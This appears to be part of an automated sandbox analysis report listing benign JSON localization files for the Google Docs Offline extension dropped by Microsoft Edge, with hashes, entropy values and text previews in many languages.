                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HArg/fjQg2JwrfZtUWTrw1P4epMnRGi5TBmuPDRxZQ/XtiCw/Rwh/Q9EVz:ogUg2JwDZe6rwKI8VTP9xK1CwhI94
                                                                                                                                                                                                                                                                                                                                    MD5:7F5F8933D2D078618496C67526A2B066
                                                                                                                                                                                                                                                                                                                                    SHA1:B7050E3EFA4D39548577CF47CB119FA0E246B7A4
                                                                                                                                                                                                                                                                                                                                    SHA-256:4E8B69E864F57CDDD4DC4E4FAF2C28D496874D06016BC22E8D39E0CB69552769
                                                                                                                                                                                                                                                                                                                                    SHA-512:0FBAB56629368EEF87DEEF2977CA51831BEB7DEAE98E02504E564218425C751853C4FDEAA40F51ECFE75C633128B56AE105A6EB308FD5B4A2E983013197F5DBA
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "....... ....".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. ..... ......... Google ......... ... ........ ...., ..... . .......... .. ........ ........ Google .......... . ........ ...... .............. ... ....... ... ...... ........ .. ...........".. },.. "explanationofflineenabled": {.. "message": "...... ..., ... . .... ...... .. ....... ...... . ........ ........ ... .. ....... .....".. },.. "extdesc": {.. "message": "....... . ........... ........., ...... . ............ . ....... ...... . ... . ... .. ... ........ .........".. },.. "extname": {.. "message
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):884
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.627108704340797
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HA0NOYT/6McbnX/yzklyOIPRQrJlvDymvBd:vNOcyHnX/yg0P4Bymn
                                                                                                                                                                                                                                                                                                                                    MD5:90D8FB448CE9C0B9BA3D07FB8DE6D7EE
                                                                                                                                                                                                                                                                                                                                    SHA1:D8688CAC0245FD7B886D0DEB51394F5DF8AE7E84
                                                                                                                                                                                                                                                                                                                                    SHA-256:64B1E422B346AB77C5D1C77142685B3FF7661D498767D104B0C24CB36D0EB859
                                                                                                                                                                                                                                                                                                                                    SHA-512:6D58F49EE3EF0D3186EA036B868B2203FE936CE30DC8E246C32E90B58D9B18C624825419346B62AF8F7D61767DBE9721957280AA3C524D3A5DFB1A3A76C00742
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "SKAPA NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du .r offline. Om du vill anv.nda Google Dokument utan internetuppkoppling, .ppna inst.llningarna p. Google Dokuments startsida och aktivera offlinesynkronisering n.sta g.ng du .r ansluten till internet.".. },.. "explanationofflineenabled": {.. "message": "Du .r offline, men det g.r fortfarande att redigera tillg.ngliga filer eller skapa nya.".. },.. "extdesc": {.. "message": "Redigera, skapa och visa dina dokument, kalkylark och presentationer . helt utan internet.tkomst.".. },.. "extname": {.. "message": "Google Dokument Offline".. },.. "learnmore": {.. "message": "L.s mer".. },.. "popuphelptext": {.. "message": "Skriv, redigera och samarbeta .verallt, med eller utan internetanslutning.".. }..}..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):980
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.50673686618174
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgNHCBxNx1HMHyMhybK7QGU78oCuafIvfCBxex6EYPE5E1pOCSUJqONtCBh8:1HAGDQ3y0Q/Kjp/zhDoKMkeAT6dBaX
                                                                                                                                                                                                                                                                                                                                    MD5:D0579209686889E079D87C23817EDDD5
                                                                                                                                                                                                                                                                                                                                    SHA1:C4F99E66A5891973315D7F2BC9C1DAA524CB30DC
                                                                                                                                                                                                                                                                                                                                    SHA-256:0D20680B74AF10EF8C754FCDE259124A438DCE3848305B0CAF994D98E787D263
                                                                                                                                                                                                                                                                                                                                    SHA-512:D59911F91ED6C8FF78FD158389B4D326DAF4C031B940C399569FE210F6985E23897E7F404B7014FC7B0ACEC086C01CC5F76354F7E5D3A1E0DEDEF788C23C2978
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "FUNGUA MPYA".. },.. "explanationofflinedisabled": {.. "message": "Haupo mtandaoni. Ili uweze kutumia Hati za Google bila muunganisho wa intaneti, wakati utakuwa umeunganishwa kwenye intaneti, nenda kwenye sehemu ya mipangilio kwenye ukurasa wa kwanza wa Hati za Google kisha uwashe kipengele cha usawazishaji nje ya mtandao.".. },.. "explanationofflineenabled": {.. "message": "Haupo mtandaoni, lakini bado unaweza kubadilisha faili zilizopo au uunde mpya.".. },.. "extdesc": {.. "message": "Badilisha, unda na uangalie hati, malahajedwali na mawasilisho yako . yote bila kutumia muunganisho wa intaneti.".. },.. "extname": {.. "message": "Hati za Google Nje ya Mtandao".. },.. "learnmore": {.. "message": "Pata Maelezo Zaidi".. },.. "popuphelptext": {.. "message": "Andika hati, zibadilishe na ushirikiane na wengine popote ulipo, iwe una muunganisho wa intaneti au huna.".. }..}..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1941
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.132139619026436
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAoTZwEj3YfVLiANpx96zjlXTwB4uNJDZwq3CP1B2xIZiIH1CYFIZ03SoFyxrph:JCEjWiAD0ZXkyYFyPND1L/I
                                                                                                                                                                                                                                                                                                                                    MD5:DCC0D1725AEAEAAF1690EF8053529601
                                                                                                                                                                                                                                                                                                                                    SHA1:BB9D31859469760AC93E84B70B57909DCC02EA65
                                                                                                                                                                                                                                                                                                                                    SHA-256:6282BF9DF12AD453858B0B531C8999D5FD6251EB855234546A1B30858462231A
                                                                                                                                                                                                                                                                                                                                    SHA-512:6243982D764026D342B3C47C706D822BB2B0CAFFA51F0591D8C878F981EEF2A7FC68B76D012630B1C1EB394AF90EB782E2B49329EB6538DD5608A7F0791FDCF5
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "..... ....... .........".. },.. "explanationofflinedisabled": {.. "message": ".......... ........... .... ....... ..... Google ......... .........., ...... .... ........... ......... ...., Google ... ................... ................ ......, ........ ......... ..........".. },.. "explanationofflineenabled": {.. "message": ".......... ..........., .......... .......... .......... ......... ........... ...... .....
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1969
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.327258153043599
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:R7jQrEONienBcFNBNieCyOBw0/kCcj+sEf24l+Q+u1LU4ljCj55ONipR41ssrNix:RjQJN1nBcFNBNlCyGcj+RXl+Q+u1LU4s
                                                                                                                                                                                                                                                                                                                                    MD5:385E65EF723F1C4018EEE6E4E56BC03F
                                                                                                                                                                                                                                                                                                                                    SHA1:0CEA195638A403FD99BAEF88A360BD746C21DF42
                                                                                                                                                                                                                                                                                                                                    SHA-256:026C164BAE27DBB36A564888A796AA3F188AAD9E0C37176D48910395CF772CEA
                                                                                                                                                                                                                                                                                                                                    SHA-512:E55167CB5638E04DF3543D57C8027B86B9483BFCAFA8E7C148EDED66454AEBF554B4C1CF3C33E93EC63D73E43800D6A6E7B9B1A1B0798B6BDB2F699D3989B052
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1674
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                                                                    MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                                                                    SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                                                                    SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                                                                    SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1063
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                                                                    MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                                                                    SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                                                                                    SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                                                                    SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1333
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                                                                                    MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                                                                    SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                                                                    SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                                                                    SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1263
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                                                                    MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                                                                    SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                                                                    SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                                                                    SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1074
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                                                                    MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                                                                    SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                                                                    SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                                                                    SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):879
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                                                                    MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                                                                    SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                                                                    SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                                                                    SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):1205
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                                                                    MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                                                                    SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                                                                    SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                                                                    SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):843
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                                                                    MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                                                                    SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                                                                    SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                                                                    SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):912
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                                                                    MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                                                                    SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                                                                    SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                                                                    SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                    Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.
                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                    Size (bytes):11406
                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                                                                                    MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                                                                                    SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                                                                                    SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                                                                                    SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                                                                                    Malicious:false
